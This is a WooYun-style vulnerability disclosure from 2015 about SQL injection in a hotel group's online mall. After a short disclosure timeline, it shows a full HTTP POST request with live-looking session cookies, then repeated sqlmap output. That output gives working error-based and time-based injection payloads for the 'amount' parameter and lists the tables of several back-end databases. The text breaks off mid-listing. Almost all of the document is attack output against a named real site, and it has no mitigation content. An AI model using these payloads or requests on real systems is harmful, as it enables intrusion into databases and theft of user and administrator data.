乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
POST /mobile/category.php?act=asynclist&brand=0&category=430&filter_attr=0&order=DESC&page=1&price_max=0&price_min=0&sort=goods_id HTTP/1.1Content-Length: 19Content-Type: application/x-www-form-urlencodedReferer: http://mall.argylehotels.comCookie: ECS_ID=a918a0fc0cc816954e7afb25f823f7c96543db59; ECS[visit_times]=6; ___OATH2_CALLBLOCK__=http%3A%2F%2Fmall.argylehotels.com%2Fmobile%2Fuser.php%3Fact%3Doath_login%26type%3Dweibo%26callblock%3Dhttp%253A%252F%252Fmall.argylehotels.com%252Fmobile%252Findex.php%26open%3D0; ECS[history]=152%2C169; ECS[display]=grid; ECSCP_ID=026919fe1348d8e098a8b3146906da113449ee17; real_ipd=117.22.221.99; PHPSESSID=f4t2i8el371fqv7p9l8tlqv2m2; Hm_lvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1447918879,1447918968,1447919015,1447919166; Hm_lpvt_fbf0ab4ef4d5dbed19698e0d0491dd4b=1447919166; HMACCOUNT=A38973CC527C211D; BAIDUID=7DB46546940D7578EB9E01DC49C7492B:FG=1Host: mall.argylehotels.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*amount=1&last=0
sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: argylebuy+--------------------+---------+| Table | Entries |+--------------------+---------+| ecs_stats | 9682 || ecs_region | 3408 || ecs_admin_log | 1104 || ecs_shop_config | 175 || ecs_keywords | 138 || ecs_admin_action | 109 || ecs_adsense | 98 || ecs_searchengine | 49 || ecs_order_action | 45 || ecs_pay_log | 43 || ecs_area_region | 34 || ecs_delivery_goods | 29 || ecs_cat_recommend | 18 || ecs_article | 17 || ecs_sessions_data | 17 || ecs_mail_templates | 15 || ecs_nav | 15 || ecs_article_cat | 11 || ecs_goods_attr | 8 || ecs_goods | 6 || ecs_reg_fields | 6 || ecs_goods_cat | 5 || ecs_shipping_area | 5 || ecs_admin_user | 4 || ecs_attribute | 4 || ecs_member_price | 4 || ecs_cart | 3 || ecs_payment | 3 || ecs_shipping | 3 || ecs_category | 2 || ecs_goods_type | 2 || ecs_products | 2 || ecs_role | 2 || ecs_sessions | 2 || ecs_tag | 2 || ecs_user_rank | 2 || ecs_brand | 1 || ecs_comment | 1 || ecs_suppliers | 1 || ecs_users | 1 |+--------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: academy+-----------------------+---------+| Table | Entries |+-----------------------+---------+| log | 11758 || course_lesson_view | 148 || status | 69 || file | 44 || cloud_app_logs | 43 || course_lesson_learn | 40 || block_history | 36 || course_lesson | 34 || setting | 21 || order_log | 20 || course_member | 19 || upload_files | 19 || notification | 15 || question | 15 || testpaper_item_result | 15 || tag | 12 || testpaper_item | 12 || course | 11 || file_group | 11 || navigation | 11 || orders | 10 || course_chapter | 8 || session2 | 8 || `user` | 7 || block | 7 || user_profile | 7 || testpaper_result | 6 || groups_member | 5 || message_relation | 5 || category | 4 || message | 4 || message_conversation | 4 || cash_account | 3 || classroom_courses | 3 || course_note | 3 || groups | 3 || testpaper | 3 || announcement | 2 || classroom_member | 2 || content | 2 || crontab_job | 2 || article | 1 || article_category | 1 || cache | 1 || category_group | 1 || classroom | 1 || cloud_app | 1 || course_review | 1 || course_thread | 1 || friend | 1 || groups_thread | 1 || groups_thread_post | 1 || sessions | 1 || user_token | 1 |+-----------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: argyleweb+---------------------------+---------+| Table | Entries |+---------------------------+---------+| v9_poster_201204 | 74312 || v9_log | 46561 || v9_linkage | 3322 || v9_model_field | 1987 || v9_poster_201307 | 1958 || v9_admin_role_priv | 942 || v9_category_priv | 908 || v9_attachment_index | 608 || v9_poster_201111 | 582 || v9_hits | 560 || v9_attachment | 543 || v9_block_history | 459 || v9_collection_content | 424 || v9_collection_history | 424 || v9_poster_201304 | 360 || v9_menu | 335 || v9_poster_201309 | 319 || v9_poster_201106 | 280 || v9_template_bak | 244 || v9_poster_201308 | 223 || v9_poster_201109 | 192 || v9_poster_201203 | 162 || v9_category | 159 || v9_poster_201310 | 154 || v9_search | 154 || v9_form_xiangmu | 143 || v9_poster_201306 | 143 || v9_cache | 132 || v9_position_data | 112 || v9_block | 97 || v9_poster_201205 | 90 || v9_poster_201305 | 85 || v9_wenzhang | 83 || v9_wenzhang_data | 83 || v9_model | 80 || v9_down_wendang | 77 || v9_down_wendang_data | 77 || v9_poster_201303 | 66 || v9_hotelsm | 65 || v9_hotelsm_data | 65 || v9_keyword_data | 65 || v9_hotelsen | 64 || v9_hotelsen_data | 64 || v9_poster_201104 | 63 || v9_page | 60 || v9_keyword | 57 || v9_form_argyleyuding | 54 || v9_poster_201201 | 47 || v9_argylenews | 44 || v9_argylenews_data | 44 || v9_form_huiyuan | 38 || v9_hdp_taihua | 23 || v9_hdp_taihua_data | 23 || v9_poster_201206 | 23 || v9_module | 22 || v9_poster_201401 | 22 || v9_poster_201302 | 20 || v9_type | 20 || v9_position | 16 || v9_sso_messagequeue | 15 || v9_poster_201311 | 14 || v9_admin | 13 || v9_site | 12 || v9_admin_role | 11 || v9_poster_201103 | 11 || v9_poster_201108 | 11 || v9_poster_201107 | 10 || v9_form_jop_argyle | 9 || v9_ktyl_taihua | 9 || v9_ktyl_taihua_data | 9 || v9_dongyi_kefang | 8 || v9_dongyi_kefang_data | 8 || v9_jop_argyle | 8 || v9_jop_argyle_data | 8 || v9_urlrule | 8 || v9_weizhi_yili | 8 || v9_weizhi_yili_data | 8 || v9_member_group | 7 || v9_sskf_taihua | 7 || v9_sskf_taihua_data | 7 || v9_xiangshan_canyin | 7 || v9_xiangshan_canyin_data | 7 || v9_xiangshan_kefang | 7 || v9_xiangshan_kefang_data | 7 || v9_brand | 6 || v9_brand_data | 6 || v9_canyin_liming | 6 || v9_canyin_liming_data | 6 || v9_kangle_liming | 6 || v9_kangle_liming_data | 6 || v9_hyyh_taihua | 5 || v9_hyyh_taihua_data | 5 || v9_kefang_dayu | 5 || v9_kefang_dayu_data | 5 || v9_kefang_liming | 5 || v9_kefang_liming_data | 5 || v9_plugin | 5 || v9_poster_201208 | 5 || v9_sso_settings | 5 || v9_weizhi | 5 || v9_weizhi_data | 5 || v9_weizhi_tianlinge | 5 || v9_weizhi_tianlinge_data | 5 || v9_xiangshan_huiyi | 5 || v9_xiangshan_huiyi_data | 5 || v9_dongyi_jianjie | 4 || v9_dongyi_jianjie_data | 4 || v9_jdwz_taihua | 4 || v9_jdwz_taihua_data | 4 || v9_jianjie_dayu | 4 || v9_jianjie_dayu_data | 4 || v9_kefang_tianlinge | 4 || v9_kefang_tianlinge_data | 4 || v9_kefang_yili | 4 || v9_kefang_yili_data | 4 || v9_plugin_var | 4 || v9_poster_201105 | 4 || v9_sskf_yili | 4 || v9_sskf_yili_data | 4 || v9_tjcx_taihua | 4 || v9_tjcx_taihua_data | 4 || v9_weizhi_liming | 4 || v9_weizhi_liming_data | 4 || v9_xiangshan_jianjie | 4 || v9_xiangshan_jianjie_data | 4 || v9_xiangshan_kangle | 4 || v9_xiangshan_kangle_data | 4 || v9_canyin | 3 || v9_canyin_data | 3 || v9_canyin_yili | 3 || v9_canyin_yili_data | 3 || v9_cuxiao_yili | 3 || v9_cuxiao_yili_data | 3 || v9_cyms_taihua | 3 || v9_cyms_taihua_data | 3 || v9_dongyi_canyin | 3 || v9_dongyi_canyin_data | 3 || v9_dongyi_huiyi | 3 || v9_dongyi_huiyi_data | 3 || v9_huiyi_liming | 3 || v9_huiyi_liming_data | 3 || v9_huiyi_yili | 3 || v9_huiyi_yili_data | 3 || v9_huodong | 3 || v9_huodong_data | 3 || v9_kefang | 3 || v9_kefang_data | 3 || v9_member_menu | 3 || v9_poster_space | 3 || v9_zpin | 3 || v9_zpin_data | 3 || v9_canyin_dayu | 2 || v9_canyin_dayu_data | 2 || v9_collection_node | 2 || v9_collection_program | 2 || v9_dongyi_kangle | 2 || v9_dongyi_kangle_data | 2 || v9_huiyi | 2 || v9_huiyi_data | 2 || v9_kangle | 2 || v9_kangle_data | 2 || v9_member_putong | 2 || v9_poster | 2 || v9_poster_201207 | 2 || v9_poster_201312 | 2 || v9_zxns_taihua | 2 || v9_zxns_taihua_data | 2 || v9_admin_panel | 1 || v9_canyin_tianlinge | 1 || v9_canyin_tianlinge_data | 1 || v9_cuxiao_dayu | 1 || v9_cuxiao_dayu_data | 1 || v9_cuxiao_liming | 1 || v9_cuxiao_liming_data | 1 || v9_cuxiao_tianlinge | 1 || v9_cuxiao_tianlinge_data | 1 || v9_dongyi_chuxiao | 1 || v9_dongyi_chuxiao_data | 1 || v9_dongyi_zhaopin | 1 || v9_dongyi_zhaopin_data | 1 || v9_huiyi_dayu | 1 || v9_huiyi_dayu_data | 1 || v9_huiyi_tianlinge | 1 || v9_huiyi_tianlinge_data | 1 || v9_kangle_dayu | 1 || v9_kangle_dayu_data | 1 || v9_kangle_tianlinge | 1 || v9_kangle_tianlinge_data | 1 || v9_member | 1 || v9_new | 1 || v9_new_data | 1 || v9_poster_201209 | 1 || v9_special | 1 || v9_sso_admin | 1 || v9_sso_applications | 1 || v9_sso_members | 1 || v9_workflow | 1 || v9_xiangshan_cuxiao | 1 || v9_xiangshan_cuxiao_data | 1 || v9_xiangshan_zhaopin | 1 || v9_xiangshan_zhaopin_data | 1 || v9_zhaopin_dayu | 1 || v9_zhaopin_dayu_data | 1 || v9_zhaopin_liming | 1 || v9_zhaopin_liming_data | 1 || v9_zhaopin_tianlinge | 1 || v9_zhaopin_tianlinge_data | 1 || v9_zhaopin_yili | 1 || v9_zhaopin_yili_data | 1 |+---------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: bbs+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| pre_common_district | 45051 || pw_windid_school | 14470 || pw_design_data | 6211 || pw_credit_log | 4087 || pw_windid_area | 3426 || pw_windid_notify | 3158 || pw_attachs | 3001 || pw_attachs_thread | 3001 || pw_design_image | 2109 || pw_bbs_threads | 1044 || pw_bbs_threads_cate_index | 1044 || pw_bbs_threads_content | 1044 || pw_bbs_threads_index | 1044 || pw_bbs_topic_type | 826 || pw_user_permission_groups | 722 || pre_common_setting | 410 || pw_windid_notify_log | 354 || pw_log_login | 315 || pw_common_config | 311 || pw_user_behavior | 248 || pw_tag_relation | 236 || pw_message_notices | 235 || pw_log | 230 || pw_design_module | 218 || pw_attention_fresh_relations | 196 || pw_design_structure | 192 || pw_acloud_sql_log | 155 || pw_bbs_posts | 147 || pw_hook_inject | 138 || pw_design_segment | 137 || pw_user | 124 || pw_user_data | 124 || pw_user_info | 124 || pw_windid_user | 124 || pw_windid_user_data | 124 || pw_windid_user_info | 124 || pw_user_belong | 123 || pw_design_bak | 116 || pw_credit_log_operate | 109 || pre_common_syscache | 104 || pre_common_block_style | 103 || pw_app_collect_thread | 99 || pw_bbs_forum | 98 || pw_bbs_forum_extra | 98 || pw_bbs_forum_statistics | 98 || pre_common_stylevar | 93 || pre_common_smiley | 85 || pw_medal_log | 85 || pw_acloud_apis | 80 || pw_application_log | 80 || pw_hook | 79 || pw_space | 78 || pw_attention_fresh | 76 || pw_like_statistics | 75 || pre_common_admincp_perm | 67 || pw_cache | 62 || pw_like_log | 55 || pw_seo | 54 || pre_common_member_profile_setting | 51 || pw_design_component | 51 || pre_common_nav | 48 || pw_bbs_forum_user | 46 || pw_like_content | 46 || pw_design_page | 38 || pw_tag | 37 || pre_forum_forumfield | 35 || pre_forum_forum | 34 || pre_common_credit_rule | 32 || pw_recycle_reply | 30 || pre_ucenter_settings | 28 || pw_attention | 28 || pw_common_emotion | 26 || pw_common_nav | 25 || pre_common_cron | 20 || pre_common_usergroup | 20 || pre_common_usergroup_field | 20 || pre_common_pluginvar | 19 || pre_home_click | 15 || pw_style | 15 || pw_user_groups | 14 || pw_windid_config | 14 || pre_common_plugin | 13 || pw_draft | 11 || pw_medal_info | 11 || pw_user_register_check | 11 || pre_forum_medal | 10 || pw_acloud_table_settings | 10 || pw_user_login_ip_recode | 10 || pre_common_optimizer | 8 || pw_application | 8 || pw_bbs_threads_hits | 8 || pre_common_admingroup | 7 || pw_design_cron | 7 || pre_forum_typeoption | 6 || pw_app_verify | 6 || pw_design_portal | 6 || pw_task_user | 6 || pre_common_admincp_group | 5 || pre_common_friendlink | 5 || pre_forum_statlog | 5 || pre_ucenter_failedlogins | 5 || pw_acloud_extras | 5 || pw_common_cron | 5 || pre_forum_bbcode | 4 || pre_forum_onlinelist | 4 || pre_ucenter_memberfields | 4 || pre_ucenter_members | 4 || pw_bbs_threads_overtime | 4 || pw_design_push | 4 || pw_online_guest | 4 || pw_recycle_topic | 4 || pw_tag_attention | 4 || pw_task | 4 || pw_task_group | 4 || pw_upgrade_log | 4 || pre_common_failedip | 3 || pre_forum_grouplevel | 3 || pre_forum_imagetype | 3 || pw_app_collect_forum | 3 || pw_app_collect_site | 3 || pw_task_cache | 3 || pre_common_block | 2 || pre_common_member | 2 || pre_common_member_count | 2 || pre_common_member_field_forum | 2 || pre_common_member_field_home | 2 || pre_common_member_profile | 2 || pre_common_member_status | 2 || pre_common_stat | 2 || pre_common_style | 2 || pre_common_template_block | 2 || pre_common_word_type | 2 || pre_mobile_setting | 2 || pw_acloud_keys | 2 || pw_admin_role | 2 || pw_app_search_record | 2 || pw_app_verify_check | 2 || pw_design_script | 2 || pw_design_shield | 2 || pw_domain | 2 || pw_medal_user | 2 || pw_online_statistics | 2 || pw_user_active_code | 2 || pw_user_work | 2 || pre_common_admincp_cmenu | 1 || pre_common_admincp_session | 1 || pre_common_credit_rule_log | 1 || pre_common_diy_data | 1 || pre_common_onlinetime | 1 || pre_common_statuser | 1 || pre_common_template | 1 || pre_forum_threadprofile | 1 || pre_ucenter_admins | 1 || pre_ucenter_applications | 1 || pw_admin_auth | 1 || pw_admin_config | 1 || pw_announce | 1 || pw_app_encryptposts | 1 || pw_bbsinfo | 1 || pw_common_emotion_category | 1 || pw_online_user | 1 || pw_remind | 1 || pw_user_tag | 1 || pw_user_tag_relation | 1 || pw_windid_app | 1 |+-----------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: myddd+-----------------------------------------------+---------+| Table | Entries |+-----------------------------------------------+---------+| lime_answers | 5008 || lime_questions | 947 || lime_question_attributes | 628 || lime_old_tokens_445896_20140718171856 | 400 || lime_old_tokens_171228_20140701150825 | 351 || lime_old_tokens_243915_20140723094003 | 300 || lime_old_tokens_328683_20140820085113 | 300 || lime_old_tokens_331935_20141119165133 | 300 || lime_old_tokens_655838_20140701150818 | 300 || lime_old_tokens_826149_20140715154041 | 300 || lime_old_tokens_853918_20141202134027 | 300 || lime_old_tokens_661389_20151120155413 | 266 || lime_tokens_713919 | 260 || lime_old_survey_445896_20140718171757 | 244 || lime_old_survey_243915_20140723094003 | 213 || lime_groups | 210 || lime_old_tokens_495165_20141116200754 | 201 || lime_old_tokens_487393_20151014175118 | 200 || lime_old_tokens_487393_20151015090049 | 200 || lime_permissions | 181 || lime_tokens_519658 | 180 || lime_old_survey_661389_20151120155413 | 155 || lime_old_survey_826149_20140703155144 | 144 || lime_old_survey_826149_20140715154041 | 144 || lime_old_survey_331935_20141119165133 | 137 || lime_survey_519658 | 130 || lime_old_survey_853918_20141202134027 | 127 || lime_old_survey_328683_20140820085113 | 101 || lime_old_tokens_199176_20151028132501 | 70 || lime_old_tokens_937727_20151021122030 | 70 || lime_old_tokens_937727_20150505090017 | 69 || lime_old_survey_171228_20140619174250 | 63 || lime_settings_global | 50 || lime_old_survey_495165_20140924093839 | 48 || lime_old_survey_171228_20140701150825 | 27 || lime_old_tokens_171228_20140616134109 | 26 || lime_surveys_languagesettings | 20 || lime_old_survey_937727_20150505090017 | 18 || lime_surveys | 15 || lime_old_tokens_733875_20151028163318 | 10 || lime_old_tokens_967542_20140604105123 | 10 || lime_old_survey_519658_20151121085349 | 8 || lime_old_survey_519658_20151121091614 | 8 || lime_labels | 6 || lime_plugins | 6 || lime_old_survey_171228_20140609135951 | 5 || lime_old_survey_487393_20151014145517 | 4 || lime_old_survey_487393_20151010175638 | 3 || lime_old_survey_816935_20140918145433 | 3 || lime_old_tokens_238349_20151028124222 | 3 || lime_old_survey_171228_20140619180446 | 2 || lime_old_survey_352836_20151019120229 | 2 || lime_old_survey_352836_20151026100650 | 2 || lime_old_survey_733875_20151028135442 | 2 || lime_old_survey_967542_20140603103211 | 2 || lime_old_survey_967542_20140604105123 | 2 || lime_user_in_groups | 2 || lime_failed_login_attempts | 1 || lime_labelsets | 1 || lime_old_survey_171228_20140619175107 | 1 || lime_old_survey_171228_20140619175747 | 1 || lime_old_survey_171228_20140619180020 | 1 || lime_old_survey_199176_20151028132501 | 1 || lime_old_survey_238349_20151028124222 | 1 || lime_old_survey_328683_20140723094251 | 1 || lime_old_survey_733875_20151028163318 | 1 || lime_old_survey_937727_20151026101203 | 1 || lime_old_survey_937727_timings_20151026101203 | 1 || lime_user_groups | 1 || lime_users | 1 |+-----------------------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: amount (POST) Type: error-based Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(5338,CONCAT(0x5c,0x7170717071,(SELECT (CASE WHEN (5338=5338) THEN 1 ELSE 0 END)),0x716a716271)),1)&last=0 Type: AND/OR time-based blind Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) Payload: amount=1 PROCEDURE ANALYSE(EXTRACTVALUE(9294,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x434e6970))))),1)&last=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.25back-end DBMS: MySQL 5.1Database: newweb+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| utf8_model_field | 4227 || utf8_log | 3926 || utf8_linkage | 3289 || utf8_keyword_data | 2285 || utf8_attachment | 1572 || utf8_attachment_index | 1532 || utf8_keyword | 1048 || utf8_hits | 982 || utf8_admin_role_priv | 540 || utf8_category_priv | 409 || utf8_menu | 349 || utf8_category | 311 || utf8_cache | 234 || utf8_search | 186 || utf8_model | 148 || utf8_position_data | 108 || utf8_news_group_cn | 99 || utf8_news_group_cn_data | 99 || utf8_page | 83 || utf8_mp_news | 72 || utf8_mp_news_data | 72 || utf8_basics_group_en | 69 || utf8_basics_group_en_data | 69 || utf8_basics_group_cn | 68 || utf8_basics_group_cn_data | 68 || utf8_pic_group_cn | 65 || utf8_pic_group_cn_data | 65 || utf8_pic_group_en | 65 || utf8_pic_group_en_data | 65 || utf8_block_history | 53 || utf8_news_group_en | 51 || utf8_news_group_en_data | 51 || utf8_special_content | 43 || utf8_form_feedback | 33 || utf8_module | 29 || utf8_ausotel_cn | 25 || utf8_ausotel_cn_data | 25 || utf8_room_group_cn | 24 || utf8_room_group_cn_data | 24 || utf8_type | 23 || utf8_form_web_subscribe | 22 || utf8_template_bak | 21 || utf8_mp_newsen | 20 || utf8_mp_newsen_data | 20 || utf8_site | 18 || utf8_m_gifts | 16 || utf8_m_gifts_data | 16 || utf8_pic_xiangguo | 14 || utf8_pic_xiangguo_data | 14 || utf8_position | 14 || utf8_room_h | 13 || utf8_room_h_data | 13 || utf8_admin_role | 12 || utf8_room_xinyi | 12 || utf8_room_xinyi_data | 12 || utf8_admin | 10 || utf8_pic_h | 10 || utf8_pic_h_data | 10 || utf8_pic_taihua | 10 || utf8_pic_taihua_data | 10 || utf8_news_jinghan | 9 || utf8_news_jinghan_data | 9 || utf8_pic_xinyi | 9 || utf8_pic_xinyi_data | 9 || utf8_career_group_cn | 8 || utf8_career_group_cn_data | 8 || utf8_spa_taihua | 8 || utf8_spa_taihua_data | 8 || utf8_urlrule | 8 || utf8_banquet_h | 7 || utf8_banquet_h_data | 7 || utf8_comment | 7 || utf8_member_group | 7 || utf8_news_h | 7 || utf8_news_h_data | 7 || utf8_poster_201402 | 7 || utf8_poster_space | 7 || utf8_repast_liming | 7 || utf8_repast_liming_data | 7 || utf8_room_liming | 7 || utf8_room_liming_data | 7 || utf8_room_taihua | 7 || utf8_room_taihua_data | 7 || utf8_banquet_taihua | 6 || utf8_banquet_taihua_data | 6 || utf8_block | 6 || utf8_brands_group_cn | 6 || utf8_brands_group_cn_data | 6 || utf8_brands_group_en | 6 || utf8_brands_group_en_data | 6 || utf8_mp_brands | 6 || utf8_mp_brands_data | 6 || utf8_mp_brandsen | 6 || utf8_mp_brandsen_data | 6 || utf8_poster | 6 || utf8_repast_h | 6 || utf8_repast_h_data | 6 || utf8_travel_liming | 6 || utf8_travel_liming_data | 6 || utf8_comment_data_1 | 5 || utf8_mp_news_en | 5 || utf8_mp_news_en_data | 5 || utf8_news_xinyi | 5 || utf8_news_xinyi_data | 5 || utf8_news_yili | 5 || utf8_news_yili_data | 5 || utf8_pic_yili | 5 || utf8_pic_yili_data | 5 || utf8_poster_201311 | 5 || utf8_room_dalat | 5 || utf8_room_dalat_data | 5 || utf8_room_dayu | 5 || utf8_room_dayu_data | 5 || utf8_room_huagang | 5 || utf8_room_huagang_data | 5 || utf8_room_jinghan | 5 || utf8_room_jinghan_data | 5 || utf8_sso_settings | 5 || utf8_tag | 5 || utf8_travel_h | 5 || utf8_travel_h_data | 5 || utf8_travel_xinyi | 5 || utf8_travel_xinyi_data | 5 || utf8_banquet2_jinghan | 4 || utf8_banquet2_jinghan_data | 4 || utf8_banquet_huagang | 4 || utf8_banquet_huagang_data | 4 || utf8_comment_check | 4 || utf8_dianping_data | 4 || utf8_news_dalat | 4 || utf8_news_dalat_data | 4 || utf8_news_dayu | 4 || utf8_news_dayu_data | 4 || utf8_news_huagang | 4 || utf8_news_huagang_data | 4 || utf8_news_taihua | 4 || utf8_news_taihua_data | 4 || utf8_news_tianlinge | 4 || utf8_news_tianlinge_data | 4 || utf8_poster_201312 | 4 || utf8_poster_201403 | 4 || utf8_repast_dalat | 4 || utf8_repast_dalat_data | 4 || utf8_repast_huagang | 4 || utf8_repast_huagang_data | 4 || utf8_room_tianlinge | 4 || utf8_room_tianlinge_data | 4 || utf8_room_yili | 4 || utf8_room_yili_data | 4 || utf8_spa_h | 4 || utf8_spa_h_data | 4 || utf8_spa_liming | 4 || utf8_spa_liming_data | 4 || utf8_spa_yili | 4 || utf8_spa_yili_data | 4 || utf8_travel_yili | 4 || utf8_travel_yili_data | 4 || utf8_workflow | 4 || utf8_banquet_liming | 3 || utf8_banquet_liming_data | 3 || utf8_banquet_yili | 3 || utf8_banquet_yili_data | 3 || utf8_comment_setting | 3 || utf8_extend_setting | 3 || utf8_member_menu | 3 || utf8_news_dongyi | 3 || utf8_news_dongyi_data | 3 || utf8_news_xiangguo | 3 || utf8_news_xiangguo_data | 3 || utf8_pic_dongyi | 3 || utf8_pic_dongyi_data | 3 || utf8_pic_jinghan | 3 || utf8_pic_jinghan_data | 3 || utf8_picture | 3 || utf8_picture_data | 3 || utf8_poster_201310 | 3 || utf8_poster_201406 | 3 || utf8_repast_dongyi | 3 || utf8_repast_dongyi_data | 3 || utf8_repast_jinghan | 3 || utf8_repast_jinghan_data | 3 || utf8_repast_taihua | 3 || utf8_repast_taihua_data | 3 || utf8_repast_xinyi | 3 || utf8_repast_xinyi_data | 3 || utf8_room_xiangguo | 3 || utf8_room_xiangguo_data | 3 || utf8_special_c_data | 3 || utf8_travel_dongyi | 3 || utf8_travel_dongyi_data | 3 || utf8_travel_xiangguo | 3 || utf8_travel_xiangguo_data | 3 || utf8_banquet_dalat | 2 || utf8_banquet_dalat_data | 2 || utf8_banquet_dongyi | 2 || utf8_banquet_dongyi_data | 2 || utf8_download | 2 || utf8_download_data | 2 || utf8_download_group_cn | 2 || utf8_download_group_cn_data | 2 || utf8_link | 2 || utf8_marketing_dalat | 2 || utf8_marketing_dalat_data | 2 || utf8_marketing_taihua | 2 || utf8_marketing_taihua_data | 2 || utf8_news_liming | 2 || utf8_news_liming_data | 2 || utf8_pic_liming | 2 || utf8_pic_liming_data | 2 || utf8_poster_201404 | 2 || utf8_repast_dayu | 2 || utf8_repast_dayu_data | 2 || utf8_repast_yili | 2 || utf8_repast_yili_data | 2 || utf8_spa_dalat | 2 || utf8_spa_dalat_data | 2 || utf8_spa_jinghan | 2 || utf8_spa_jinghan_data | 2 || utf8_spa_xiangguo | 2 || utf8_spa_xiangguo_data | 2 || utf8_special | 2 || utf8_travel_dalat | 2 || utf8_travel_dalat_data | 2 || utf8_travel_taihua | 2 || utf8_travel_taihua_data | 2 || utf8_video_group_cn | 2 || utf8_video_group_cn_data | 2 || utf8_video_group_en | 2 || utf8_video_group_en_data | 2 || utf8_wap_type | 2 || utf8_banquet_dayu | 1 || utf8_banquet_dayu_data | 1 || utf8_banquet_tianlinge | 1 || utf8_banquet_tianlinge_data | 1 || utf8_banquet_xiangguo | 1 || utf8_banquet_xiangguo_data | 1 || utf8_comment_table | 1 || utf8_datacall | 1 || utf8_dianping_type | 1 || utf8_download_group_en | 1 || utf8_download_group_en_data | 1 || utf8_house | 1 || utf8_house_data | 1 || utf8_marketing_dongyi | 1 || utf8_marketing_dongyi_data | 1 || utf8_marketing_h | 1 || utf8_marketing_h_data | 1 || utf8_marketing_liming | 1 || utf8_marketing_liming_data | 1 || utf8_marketing_xinyi | 1 || utf8_marketing_xinyi_data | 1 || utf8_marketing_yili | 1 || utf8_marketing_yili_data | 1 || utf8_mood | 1 || 